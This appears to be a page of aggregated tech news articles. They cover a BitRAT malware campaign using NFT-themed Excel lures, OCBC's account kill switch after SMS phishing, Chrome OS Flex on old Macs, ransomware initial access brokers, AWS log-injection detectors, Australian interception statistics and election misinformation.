Information Technology

Cybercriminals are exploiting the growth in popularity of NFTs in efforts designed to trick victims into downloading trojan malware capable of hijacking their PCs while stealing usernames and passwords.Cybersecurity researchers at Fortinet have spotted what’s described as a “peculiar-looking Excel spreadsheet” which purports to contain information about NFTs – but the real purpose of the file is to aid the delivery of BitRAT malware.BitRAT is a remote access trojan (RAT) that first emerged for sale in underground forums in August 2020. What makes it notable is it can bypass User Account Control (UAC), a Windows feature which helps to prevent unauthorised changes to the operating system.The malware comes with various trojan functions, including the ability to steal login credentials from browsers and applications, the ability to log keystrokes and the ability to upload and download files. This edition of BitRAT can also monitor the screen of the victim in real-time, use their webcam and listen to audio through the microphone.It’s not detailed how the malicious Excel file is distributed to victims, but it claims to offer information on forecasts on potential investment returns and the number NFTs available in each series. It also contains links to legitimate Discord channels on NFTs, meaning it’s likely that the intended victims are NFT enthusiasts.SEE: A winning strategy for cybersecurity (ZDNet special report)The Excel file contains a malicious macro, which if enabled, runs a PowerShell script that retrieves and downloads malware, before secretly running it on the compromised machine.

NFTs (non-fungible tokens) are digital tokens that use the blockchain to verify the authenticity of digital content and ownership. The hype surrounding NFT art and other collectables means that they can trade hands for millions of dollars.When there’s hype and money involved, people quickly become interested. But cybercriminals are always looking for new trends and themes to exploit to trick victims into opening phishing emails or downloading malware – and now they’re leveraging the interest in NFTs.In addition to collecting data and snooping on the victim, BitRAT can also install cryptojacking malware on the infected machine, enabling them to secretly use the processing power to mine for Monero cryptocurrency.As NFTs can change hands for large amounts of money, it’s potentially the case that the cybercriminals behind this campaign are financially motivated. But even if the victim doesn’t own NFTs, the amount of personal information that can be stolen with trojan malware can be extremely valuable to the attackers – and damaging for the victim.”Be mindful that attackers often use attractive and trendy subjects as lures. As NFTs become increasingly popular, they will be used to entice victims into opening malicious files or clicking on malicious links,” Fortinet researchers warned. “Standard security practices such as not opening files downloaded from untrusted or suspicious sources can prevent threat actors from gaining access to users’ money and valuable data,” they added.MORE ON CYBERSECURITY More

Hit by a recent spat of SMS phishing scams, OCBC Bank has introduced a “kill switch” that it says will let its customers cut access to all their accounts if they suspect their personal data have been compromised. When activated, the kill switch will immediately freeze all accounts including digital banking, e-payment, ATM access, and credit cards. Customers will need to call the Singapore bank’s hotline and use option “8” to trigger the kill switch, OCBC said in a statement Wednesday. They also will be able to do so via the bank’s network of 500 ATMs next month. “Once the kill switch is activated, no transactions–whether done digitally, via an ATM or at branches–can be made. Even recurring or pre-arranged fund transfers will be disabled,” OCBC said. 

A customer service representative then would contact the customer to remove compromised bank account access or replace compromised cards with new ones. Only a bank branch employee or customer service executive would have the authority to deactivate the switch, according to OCBC. This also would be carried out only after the bank staff received verified instructions from the customer to do so. Access to all accounts as well as settings, including GIRO arrangements and scheduled funds transfers, would be reinstated once the kill switch was deactivated. OCBC added that the new feature would be offered alongside the bank’s fraud hotline, introduced last month, to guide customers who needed assistance in scam incidents, such as in making a police report. 

The safeguards come in the heels of a recent spate of SMS phishing scams, which wiped out SG$13.7 million ($10.17 million) from the accounts of 790 OCBC Bank customers. Scammers had manipulated SMS Sender ID details to push out messages that appeared to be from OCBC, urging the victims to resolve issues with their bank accounts. They then were redirected to phishing websites and instructed to key in their bank login details, including username, PIN, and One-Time Password (OTP).  Describing the incident as the country’s most serious phishing scam involving spoofed SMSes impersonating banks, Singapore’s Minister for Finance Lawrence Wong said Tuesday that various steps would be taken to better mitigate the risks of such scams. These would span the entire ecosystem, including banks, telecommunications, law enforcement, and consumer education.Banks, for example, would be working to further bolster their fraud monitoring capabilities to better identify suspicious and anomalous transactions, including credit card transactions. They would develop more versatile algorithms employing AI and machine learning to detect suspicious transactions. Wong said. “Such algorithms should be based on multiple sources of information, including customer profile and vulnerabilities, past transaction patterns, account activity, and mobile device identification.”In addition, SMS service providers and telcos would be required to check against the national Sender ID registry and only send through messages when the sender details match the registry records. All organisations also must have a valid UEN (unique entity number) if they want to send SMS messages through registered IDs, to phone subscribers in Singapore. All major retail banks in Singapore are required to register their Sender ID details with the registry, as are government agencies.Wong on Tuesday had eluded to the possibility of a kill switch for customers to freeze their own accounts without needing to contact the banks. RELATED COVERAGE More

Apple has supported

Macs

 for many years, but inevitably the day will come when the support plug is pulled, and security patches dry up.

ZDNet Recommends

The best Macs

Apple’s Mac lineup can be confusing as the company transitions from Intel processors to its own Apple Silicon processors. But we’re here to help.

Read More

And once that happens, it’s the beginning of the end.And then it’s time for the scrap heap.Well, if you’re someone who didn’t send their old Mac off to the scrap heap (or, as it would be today, the recycling center), then you might be able to give the system a new lease of life thanks to Google.Yes, you read that, right. Google. Chrome OS Flex is Google’s latest project, and it brings Chrome OS to

Macs

 and PCs. Aimed at businesses and schools, it is currently in the early access stage and has been designed to be installed in minutes and will look and feel the same as Chrome OS.Google has published a certified models list of systems that will run Chrome OS Flex, and on that list are a number of Macs that are either verified to work or will work but with minor issues.

Also: Apple’s M1 Pro MacBook Pro is an amazing Windows 11 laptopHere’s the listing:Macs supported by Google Chrome OS FlexWe can decipher this list into something a bit more useful, and we can see that they span 2009 to 2015:iMac 21.5-inch Midv2010iMac 21.5-inch Mid 2011/Late 2011iMac 20-inch Early 2009/Mid 2009Mac Mini Late 2014MacBook 13-inch Early 2009/Mid 2009MacBook 13-inch Late 2009MacBook 13-inch Mid 2010MacBook Air 11-inch Mid 2012MacBook Air 11-inch Mid 2013/Early 2014MacBook Pro 13-inch Mid 2009MacBook Pro 13-inch Mid 2012As you can see, a lot of Macs here going back over a decade. Macs that Apple has long forgotten.Oh, and Chrome OS Flex also runs on a variety of PCs from vendors ranging from Acer, ASUS, Dell, HP, Microsoft, Toshiba, and many more.It’s an interesting project and a good way to offer a new lease of life for older macs. That said, I wonder just how many Macs are still around from the 2009 to 2015 era. More

The ongoing situation in Ukraine means organisations around the world should be prepared to defend their networks against cyberattacks originating from Russia – although the potential impact of aggressive cyber activity shouldn’t be overestimated. “Concerns are reasonable and valid; Russia has a well-established history of aggressively using their considerable cyber capabilities in Ukraine and abroad,” said Sandra Joyce, executive vice president of global intelligence at cybersecurity company Mandiant, which regularly tracks hostile Russian cyber activity.

Russia is suspected of being behind offensive cyber campaigns against other countries, including cyberattacks against Georgia, as well as attacks that took down Ukrainian power grids in December 2015.SEE: A winning strategy for cybersecurity (ZDNet special report)International consensus has also accused the Russian military of being behind the widespread and disruptive NotPetya malware attack of June 2017.NotPetya was designed to target organisations in the Ukrainian financial, energy and government sectors, but powered by EternalBlue – a leaked NSA hacking tool – the self-replicating virus quickly spread to organisations around the world. It wiped networks and caused what was estimated as billions of dollars in damages as victims across Europe, Asia and the Americas were impacted by a cyberattack that wasn’t directly aimed at them. Mandiant warned that this type of incident could potentially happen again.

“We are concerned that, as the situation escalates, serious cyber events will not merely affect Ukraine,” said Joyce.”But while we are warning our customers to prepare themselves and their operations, we are confident that we can weather these cyberattacks. We should prepare, but not panic because our perceptions are also the target,” she added.Organisations that fell victim to NotPetya did so because they hadn’t yet applied critical security updates, which were released months before and were designed to protect networks against EternalBlue.Meanwhile, cyber criminals and nation state-backed hackers continue to take advantage of security issues like the vulnerabilities in Microsoft Exchange, which received critical security updates last year but, in many cases, still haven’t been applied by businesses or consumers.Applying security patches in a timely manner can go a long way to protecting networks and infrastructure against intrusions.”We are imploring our customers and community to prepare for disruptive and destructive attacks, similar to those that have recently transpired in Ukraine,” said Joyce. “Many of the same steps defenders might take to harden their networks against ransomware crime will serve to prepare them from a determined state actor – if they take them now”.SEE: Cloud security: A business guide to essential tools and best practices Mandiant also warned that part of the strategy behind offensive cyber activity is designed to create worry and uncertainty. By ensuring that networks are as well-defended against attacks as possible, the damage done by attacks can be minimised, avoiding the panic that adversaries hope to generate.”Cyberattacks can be costly for individual organisations and may even seem frightening to some, but their real target is our perceptions. The purpose of these cyberattacks is not simply to wipe hard drives or turn out the lights, but to frighten those who cannot help but notice,” said Joyce.”The audience of these attacks is broad, but it is also empowered to determine how effective they are. While these incidents can be quite serious for many, we must remain mindful of their limitations. We only do the adversary a service by overestimating their reach.”Mandiant’s warning follows a similar warning from the UK’s National Cyber Security Centre in January, which urged organisations to take action to bolster their cyber resilience as a result of the ongoing tensions around Russia and Ukraine.In recent weeks, Ukraine has faced DDoS attacks affecting government services as well as banks, while government websites have been defaced. Nobody has yet explicitly claimed responsibility for the attacks.MORE ON CYBERSECURITY More

To perform a ransomware attack successfully, cybercriminals must first obtain access to their victim’s PC or network. Gone are the days when ransomware was confined to malware that targeted individuals with fake threats from organizations like the FBI or IRS, demanding payment through a PC pop-up following encryption. 

Now, while individuals may still encounter ransomware — especially when antivirus programs are not in use — companies are the big game that criminals hunt.  Time is money in the corporate world, and ransomware has exploded in recent years to become an almost separate cybercriminal business of its own. As a result, ‘sub’ services have emerged that assist ransomware developers in the deployment of their illicit creations — ranging from language services to handle ransom payment negotiation to Initial Access Brokers (IABs) who offer the covert access to a network required in the first stage of a ransomware attack.  As noted in new research conducted by KELA, the ransomware-as-a-service (RaaS) economy relies on IABs to reduce the need for extended reconnaissance or the time to find a method for entry.  On average, IABs sell initial access for $4600, and sales take between one and three days to finalize. In the cases identified by the cybersecurity firm, once access has been purchased, it takes up to a month for a ransomware attack to take place — and potentially for the victim to be subsequently named and shamed on a leak site. 
KELA
At the very least, five known Russian-speaking ransomware operators are using IABs: LockBit, Avaddon, DarkSide, Conti, and BlackByte.

KELA conducted an examination of past security incidents involving these ransomware groups. First up is LockBit, of which an attack began against Bangkok Airways due to AnyConnect VPN access offered by a threat actor called “babam.”While it isn’t clear exactly who purchased Bangkok Airways access, on August 23, 2021 — not yet a month after access was offered in underground forums — the airline became infected by ransomware. Two days later, Bangkok Airways appeared on the LockBit leak site. “Bangkok Airways did not disclose any investigation details, but based on the timeline, it is highly possible that the attack was performed using the bought access,” the researchers noted. 
KELA
In an attack conducted by Avaddon, access to a UAE steel product supplier was found to be up for sale on a forum in a post dated March 8, 2021. Three weeks later, the company appeared on the Avaddon domain. (This group has reportedly closed down and a tool has been made available to generate decryption keys.)DarkSide is infamous for an attack on Colonial Pipeline that caused fuel panic-buying in the United States. However, in a separate incident taking place on January 16, 2021, the same “babam” IAB tried to sell access to mining technology firm Gyrodata.  Two days later, access was declared as sold, and between January 16 and February 22, an unauthorized actor was lurking on the firm’s networks. On February 20, DarkSide published the company’s name as a victim.  In another case, access to a US manufacturer was sold on October 8, 2021, for $800. Within two weeks, Conti exposed the firm on its leak site and some stolen data was also published online.   Ransomware attacks against high-profile targets won’t be going away anytime soon. Just before the Super Bowl kicked off, the San Francisco 49ers became the latest victim of BlackByte, who also named the organization on a leak website. Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Amazon Web Services (AWS) has updated the ‘detectors’ in its CodeGuru Reviewer tool to seek out log injection flaws like the recently disclosed Log4Shell bug in the popular Java logging library Log4J.The critical Log4J bugs, collectively dubbed Log4Shell after their disclosure in December, jolted the tech industry and end-user organizations into mass remediation efforts that may have averted major attacks to date, but are expected to lurk in systems for years.

At the time, AWS released several tools to help customers protect resources, such as new web application firewall rules, and updates to its Inspector tool to detect the vulnerability in EC2 VM instances.SEE: Cybersecurity: Let’s get tactical (ZDNet special report)AWS has now announced two new features for CodeGuru Reviewer, AWS’s scanner that uses machine learning to check code during reviews for bugs and to suggest improvements for security issues. The tool aims to improve code reviews in the context of continuous integration and development (CI/CD) processes for developers with code. After developers commit code to say, GitHub or Bitbucket, they can add CodeGuru Reviewer as a code reviewer.The new features help flesh out the service’s security checks. Last year, it added the CodeGuru Reviewer Secrets Detector, which detects risky hardcoded secrets in source code and configuration files for Java and Python applications, like passwords and API access keys.The brand-new features for CodeGuru Review are a new Detector Library for several common security flaws affecting Java and Python web applications, as well as several new security detectors specifically aimed at Log4Shell-like log injection flaws.

The Detector Library contains a list of several detectors for various flaws common to Java and Python programming, such as unauthenticated LDAP requests in Java code. It offers details about each security issue, their severity and impact on an application, and one case of non-compliant and compliant code for each issue. The library currently contains 91 Java detectors and 69 Python detectors.AWS notes that CodeGuru “uses machine learning and automated reasoning” to identify possible issues, so each detector can find a range of defects on top of the example on the detector’s description page.In response to Log4Shell, AWS introduced a more general detector for similar flaws that check if developers are logging data that “is not sanitized and possibly executable”. If it finds an example of such code, it warns that “user-provided inputs must be sanitized before they are logged. An attacker can use unsanitized input to break a log’s integrity, forge log entries, or bypass log monitors.” It then provides examples of non-compliant and compliant code. “These detectors work with Java and Python code and, for Java, are not limited to the Log4j library,” AWS notes. “They don’t work by looking at the version of the libraries you use, but check what you are actually logging. In this way, they can protect you if similar bugs happen in the future.”The service comes at a cost, but might help alleviate issues for organizations facing developer or security skills shortages. The new features are available where CodeGuru Reviewer is available, which includes select US, Europe and Asia Pacific AWS regions. Pricing for CodeGuru Reviewer starts at $10 a month for the first 100,000 lines of code in onboarded repositories, and charges $30 a month for each additional 100,000 lines of code.   More

When it comes to Australia’s encryption laws, two out of the three arms can now be publicly said to have been used, following the release of the Telecommunications (Interception and Access) Act 1979 — Annual Report 2020-21 this week. In previous years, agencies had only used voluntary Technical Assistance Requests (TAR) to get service providers to help them, but the latest report shows NSW Police in the past year also turned to the first of the compulsory notices available. That request, used in a homicide investigation, is the first use of a compulsory Technical Assistance Notice (TAN) to force a provider to use a capability they already possess. Assistance notices issued by state-level law enforcement are reviewed by the Commissioner of the Australian Federal Police (AFP). Read more: What’s actually in Australia’s encryption laws? Everything you need to know This leaves the compulsory Technical Capability Notice (TCN) as the only form of notice yet to be publicly disclosed as used. The TCN forces providers to build a new capability for agencies and requires sign-off from the federal Attorney-General and Minister for Communications. The report said no TCNs were sought across the reporting period.Of the 25 TARs issued by agencies, NSW Police accounted for 16, Victoria Police for five, with the AFP and Australian Criminal Intelligence Commission both issuing a pair. The category of offences under which the TAR was issued were eight for organised offences, seven for homicide, seven for drug offences, and one each for sexual assault, cybercrime, and acts intended to cause injury. Australia’s encryption laws were passed in December 2018, with then-Labor leader Bill Shorten saying he wanted to make Australians safe over Christmas. A year later after losing an election, Labor wanted to fix the laws it voted for.

Since its passing, the most public display of these powers has been Operation Ironside, which the AFP labelled its “most significant operation in policing history”.A recent review of the TOLA Act gave a tick to the laws, but it did so while asking for additional safeguards to be added.For the now AU$238 million metadata retention scheme, over 314,000 requests for telco data were made. Almost 270,000 pieces of retained data were less than three months old, while over 5,700 were beyond the two-year retention window. Victoria Police made the most requests, with over 110,000, followed by NSW Police on 106,000, and WA Police making just over 26,200 requests for the period. Over 312,000 of the requests related to criminal offences, and almost 3,500 related to missing persons. Following the trend of years past, drug offences continued to be the offence with the most requests, this year with 68,500, followed by fraud, homicide, unlawful entry, abduction, and sexual assault all sitting in a band between 29,000 to 20,000 requests each. No agencies were authorised to become an enforcement agency in the 2020-21 reporting period, the report said. Inception warrants also continued the trend of past years, with Administrative Appeals Tribunal (AAT) members continuing to issue the vast bulk of said warrants, accounting for 2,900 of the 3,500 warrants issued. Of the AAT member number, just shy of 1,700 warrants were applied for by NSW Police with the force only getting 72 from Federal Court judges. Similarly, the AFP had 590 warrants approved by AAT members from its 653 total. Overall, 3,481 interception warrants were issued to all agencies, and information gained was used in 3,327 arrests, 6,424 prosecutions, and 2,610 convictions. Related Coverage More

Image: Getty Images
The circulation of election conspiracy theories in Australia has increased with the country set to have its federal election later this year, Australia’s electoral commissioner said on Tuesday night. Appearing before Senate estimates, AEC commissioner Tom Rogers said the uptick in election conspiracy theories mirrored what has been occurring in overseas jurisdictions. Among the conspiracies posted online has been that postal voting is not secure, Rogers said. The AEC commissioner also warned of other election conspiracies, specifically debunking misinformation that unvaccinated people will not be allowed to vote in person.”One [conspiracy] doesn’t seem to go away is that somehow we’re mandating that voters be vaccinated, and that this will deny people the vote,” he said, confirming that people will be allowed to vote in person regardless of their vaccination status. To address the rise in conspiracy theories, Rogers said his agency has been working more closely with social media platforms to quickly remove election misinformation and disinformation. For one instance of the postal voting conspiracy content arising online, the commissioner said his agency pointed out to Twitter that the content breached the platform’s terms of service, which culminated in that information being removed within three hours. “Twitter and others get rightly criticised, but it’s a shout out to them for being very responsive to remove something that’s dangerous,” Rogers said.

He noted, however, that addressing election misinformation is a complex issue as the nature of some conspiracies means their removal can fuel the creation of further conspiracies. “[This] can become very circular, so you need to exercise some judgment about how we deal with those issues,” he said. Rogers added that while the AEC was able to reach out to Twitter, negotiations are still ongoing with Digital Industry Group Inc (DiGi), the industry group advocating for big tech, to create a formal protocol for working with social media platforms to remove election disinformation and misinformation. In the meantime, all major social media platforms have given “assurances” that they would allocate more resources for monitoring election disinformation and misinformation for the upcoming Australian federal election, said deputy electoral commissioner Jeff Pope, who appeared alongside Rogers at Senate estimates. “For this election, we’re getting assurances from all of them that they will be expanding their hours of service, including having not just expanded hours of service here in Australia but then actually having staff in other parts of the world so that they can try and get as close to 24/7 coverage — so they’re not confined by the business hours of the staff here in Australia,” Pope explained. “For instance, some of them have staff here in Australia, they have a regional office in Singapore, then they have another office in Europe. They will be effectively following the sun as we go through the election to try and get as much maximum coverage as possible.” For the upcoming federal election, where voting is mandatory, the commission expects to go through 4.5 million pencils — up from 100,000 in 2019 — along with 34,000 bottles of surface cleaner, and 63,000 litres of hand sanitiser as part of its pandemic safety measures. Related Coverage More